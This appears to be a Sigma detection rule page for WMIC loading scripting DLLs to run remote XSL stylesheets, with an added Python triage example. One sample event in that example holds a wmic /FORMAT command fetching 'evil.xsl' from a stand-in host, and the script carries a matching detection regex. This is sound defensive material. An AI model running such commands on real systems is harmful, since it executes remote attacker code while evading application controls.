WMIC Loading Scripting Libraries

Sigma Rules

Summary
This detection rule identifies misuse of the Windows Management Instrumentation Command-line utility (WMIC) to load scripting libraries, which is what happens when a threat actor uses it to execute code fetched from a remote source. WMIC's `/FORMAT` argument, intended to select an XSL stylesheet that formats query output, also accepts a URL or UNC path; an attacker can point it at an XSL file that embeds JScript or VBScript, and WMIC will load the corresponding script engine and run that code. Because the script runs inside the trusted, signed wmic.exe binary rather than as a standalone .js or .vbs file, this is a defense evasion technique (XSL Script Processing, ATT&CK T1220) that can bypass application controls aimed at restricting executable content. The rule works on image-load telemetry (for example Sysmon Event ID 7) and fires when wmic.exe loads jscript.dll or vbscript.dll, the dynamic-link libraries that implement those script engines. It helps security teams surface attempts at this technique in a Windows environment. False positives are expected, since some legitimate WMIC invocations that retrieve system information also load vbscript.dll; the loaded DLL alone does not prove that a remote stylesheet was used. An alert should therefore be triaged against the process-creation event for the same wmic.exe instance, in particular its command line and whether `/FORMAT` referenced a remote or otherwise unexpected XSL file.
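As an added example that is not part of the Sigma rule or of this page, the following Python reproduces the rule's selection logic and the recommended triage step over a handful of constructed Sysmon-style events (EventID 1 process creation and EventID 7 image load). Field names follow Sysmon's; the sample events, process GUIDs and the `example.invalid` URL are constructed, and the `high`/`low` severity labels are an assumption of this example, not something the rule defines.

```python
"""
Added example: re-implementation of the "WMIC Loading Scripting Libraries"
selection logic plus a triage step, run over constructed Sysmon-style events.

Rule logic, as described in the summary:
  Image        endswith  \wmic.exe
  ImageLoaded  endswith  \jscript.dll  OR  \vbscript.dll

Triage (the page's recommendation): join each hit to the process-creation
event of the same wmic.exe instance and check whether /FORMAT pointed at a
remote stylesheet (http/https URL or UNC path).
"""
import re

# Constructed sample events in a simplified Sysmon shape (not real logs).
# EventID 1 = ProcessCreate, EventID 7 = ImageLoad. GUIDs are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /FORMAT:"https://example.invalid/evil.xsl"'},
    {"EventID": 7, "ProcessGuid": "{A1}", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ImageLoaded": r"C:\Windows\System32\jscript.dll"},
    # Legitimate-looking inventory query that still pulls in vbscript.dll:
    {"EventID": 1, "ProcessGuid": "{B2}", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic computersystem get name /FORMAT:list"},
    {"EventID": 7, "ProcessGuid": "{B2}", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},
    # wmic loading a non-scripting DLL: must not match.
    {"EventID": 7, "ProcessGuid": "{C3}", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ImageLoaded": r"C:\Windows\System32\wbem\wbemcomn.dll"},
    # A different host process loading vbscript.dll: must not match.
    {"EventID": 7, "ProcessGuid": "{D4}", "Image": r"C:\Windows\System32\cscript.exe",
     "ImageLoaded": r"C:\Windows\System32\vbscript.dll"},
]

SCRIPTING_DLLS = ("\\jscript.dll", "\\vbscript.dll")

# /format may be written /FORMAT:, /format=, with or without quotes; a remote
# stylesheet is an http(s) URL or a UNC path (two leading backslashes).
REMOTE_FORMAT = re.compile(r'/format\s*[:=]\s*"?\s*(https?:|\\\\)', re.IGNORECASE)


def matches_rule(event):
    """Sigma selection: an image-load event where wmic.exe loads a script engine DLL."""
    if event.get("EventID") != 7:
        return False
    image = event.get("Image", "").lower()
    loaded = event.get("ImageLoaded", "").lower()
    return image.endswith("\\wmic.exe") and loaded.endswith(SCRIPTING_DLLS)


def triage(events):
    """Return one finding per rule hit, enriched with the matching ProcessCreate
    command line and a severity that reflects whether /FORMAT was remote."""
    cmdlines = {e["ProcessGuid"]: e.get("CommandLine", "")
                for e in events if e.get("EventID") == 1}
    findings = []
    for e in events:
        if not matches_rule(e):
            continue
        cmd = cmdlines.get(e["ProcessGuid"], "")
        remote = bool(REMOTE_FORMAT.search(cmd))
        findings.append({
            "ProcessGuid": e["ProcessGuid"],
            "ImageLoaded": e["ImageLoaded"],
            "CommandLine": cmd,
            # Assumed labels for this example: remote stylesheet = high,
            # otherwise low (still worth a look, but likely a false positive).
            "Severity": "high" if remote else "low",
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['Severity']}] {f['ProcessGuid']} loaded {f['ImageLoaded']}: {f['CommandLine']}")
```

Run as written, the script reports two hits: the `{A1}` instance (remote XSL via `/FORMAT`, high) and the `{B2}` inventory query (low), while the non-scripting DLL load and the cscript.exe load are ignored. The join on `ProcessGuid` is what turns the bare image-load alert into something an analyst can act on; without the command line, the `{B2}` case is indistinguishable from the attack.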
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
  • Image
  • Command
Created: 2020-10-17